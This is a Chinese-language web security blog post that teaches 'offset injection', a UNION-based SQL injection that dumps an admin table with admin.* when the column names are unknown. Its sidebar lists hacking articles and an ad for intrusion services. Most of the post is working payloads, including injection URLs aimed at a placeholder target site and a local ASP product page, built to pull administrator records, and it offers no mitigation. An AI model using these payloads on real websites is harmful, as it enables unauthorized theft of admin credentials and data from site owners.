1、简介
这种注入方式合适在找到表找不到字段的情况下使用。
这种注入方式 需要联合两个表 所以这种注入也是联合查询注入的一种。
2、原理
在SQL中查询 select * from admin 星号代表所有字段。
而且 select * from admin 的结果等于下面几种结果
select admin.*from admin
select admin.id,admin.username,admin.password from admin
selectid,username,password from admin
在使用位移注入这种注入方法,需要确定当前表的,字段数
表article 的字段为3个
使用联合语句 把另外一个表联合进来查询
select * from article where id=1 union select 1,2,3 from admin
admin的表的字段数同样也是3个 把admin.* 替换1,2,3
select * from article where id=1 union select admin.* from admin
语句并没有报错 因为列数一样 同样也会显示表admin里面的字段数据
把语句改成这样就会只显示 表 admin的数据
select * from article where id=-1 union select admin.* from admin
注意:
使用这种方法
当前表的字段大于或等于联合的表
这里当前表就是 article 联合的表就是 admin
3、网站测试
http://target_sys.com/article.php?id=-1 union select admin.* from admin
4、其他数据库
在其他数据库中也可以使用这种方法,例如access
order by的字段数
select * from product where id=100 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26from admin
product 的表字段数为26
select * fromproduct where id=100 union select 1,2,3,4,5,6,7,8,9,10,11,12,* from admin
这里的*星号代表admin的字段数所以用26-13=13 所以admin的字段个数为13
用admin.*替换这里的 * 星号
select * from product where id=100 union select 1,2,3,4,5,6,7,8,9,10,11,12,admin.* from admin
在网站里面测试
http://127.0.0.1:99/ProductShow.asp?ID=100 union select 1,2,3,4,5,6,7,8,9,10,11,12,admin.* from admin
这样同样也是可以执行语句 获取数据,也可以将admin.*放到其他列
select * from product where id=100 union select admin.*,2,3,4,5,6,7,8,9,10,11,12,13 from admin
http://127.0.0.1:99/ProductShow.asp?ID=100 union select admin.*,2,3,4,5,6,7,8,9,10,11,12,13 from admin
同样也是可以执行的。
同样星号也可以放在其他位置
select * from product where id=100 union select *,2,3,4,5,6,7,8,9,10,11,12,13 from admin select * from product where id=100 union select admin.*,2,3,4,5,6,7,8,9,10,11,12,13 from admin
表名.* 和* 这种同样的可以也是表示字段数 他两种结果是不一样 的。
猜你还喜欢
- 07-08八年专业安全团队承接渗透入侵维护服务
- 08-06SQLMAP的注入命令以及使用方法
- 08-03白帽故事汇:网络安全战士从来不是「男生」的专利
- 07-27编辑器漏洞手册
- 07-12web安全之如何全面发现系统后台
- 02-22常见Web源码泄露总结
- 07-25网站后台登陆万能密码
- 07-23破解emlog收费模板“Begin”
- 01-12批量检测SQL注入
- 01-22Apache Solr远程代码执行漏洞(CVE-2017-12629)从利用到入侵检测
- 随机文章
-
- XSS现代WAF规则探测及绕过技术
- php入门教程
- PHP一些实用的自定义函数收集
- 实战Linux下三种不同方式的提权技巧
- 最近忙,博客暂时没时间打理...
- 那些年我们一起追逐过的安全工具
- php安全代码审计小结
- Struts2漏洞利用工具Devmode版发布(附带源码)
- BruteXSS:XSS暴力破解神器
- 使用sqlmap进行sql注入
- Kali Linux渗透基础知识整理(三):漏洞利用
- 高通曝Quadrooter高危漏洞, 影响全球9亿安卓用户
- 那些强悍的PHP一句话后门
- cmseasy前台无需登录直接获取敏感数据的SQL注入(有POC证明)
- Stuxnet纪录片-零日 Zero.Days (2016)【中文字幕】
- 恶意程序报告在线查询工具
- 几条让你的Linux”自爆”的命令
- CentOS DNS服务配置
- asp截获后台登录密码
- CVE-2013-2471漏洞分析
- 热门文章
-
- 八年专业安全团队承接渗透入侵维护服务
- Emlog黑客站模板“Milw0rm”发布
- Stuxnet纪录片-零日 Zero.Days (2016)【中文字幕】
- SQLMAP的注入命令以及使用方法
- 白帽故事汇:网络安全战士从来不是「男生」的专利
- 编辑器漏洞手册
- web安全之如何全面发现系统后台
- 常见Web源码泄露总结
- 渗透测试培训(第五期)
- 深入理解JAVA反序列化漏洞
- cmseasy前台无需登录直接获取敏感数据的SQL注入(有POC证明)
- 网站后台登陆万能密码
- 黑麒麟2016渗透培训系列教程
- 破解emlog收费模板“Begin”
- 那些强悍的PHP一句话后门
- Android平台渗透测试套件zANTI v2.5发布(含详细说明)
- 渗透工具BackTrack与KaliLinux全套视频教程
- Python列为黑客应该学的四种编程语言之一 初学者该怎么学
- CVE-2017-11882漏洞复现和利用
- 恶意程序报告在线查询工具
文章存档
- 2021年3月(4)
- 2020年12月(4)
- 2020年11月(5)
- 2020年10月(8)
- 2020年9月(8)
- 2020年8月(20)
- 2020年7月(47)
- 2020年6月(70)
- 2020年5月(41)
- 2020年4月(21)
- 2020年3月(120)
- 2020年2月(26)
- 2019年12月(12)
- 2019年11月(13)
- 2019年10月(17)
- 2019年9月(15)
- 2019年8月(13)
- 2019年7月(15)
- 2019年6月(15)
- 2019年5月(19)
- 2019年4月(23)
- 2019年3月(19)
- 2019年2月(11)
- 2019年1月(29)
- 2018年12月(24)
- 2018年11月(56)
- 2018年10月(79)
- 2018年9月(20)
- 2018年8月(17)
- 2018年7月(16)
- 2018年6月(7)
- 2018年5月(10)
- 2018年3月(6)
- 2018年2月(2)
- 2018年1月(11)
- 2017年11月(18)
- 2017年10月(6)
- 2017年9月(8)
- 2017年8月(7)
- 2017年7月(7)
- 2017年6月(15)
- 2017年5月(30)
- 2017年4月(7)
- 2017年3月(1)
- 2017年2月(4)
- 2017年1月(1)
- 2016年12月(3)
- 2016年11月(7)
- 2016年10月(6)
- 2016年9月(6)
- 2016年8月(102)
- 2016年7月(24)
- 2013年7月(1)
- 文章标签
-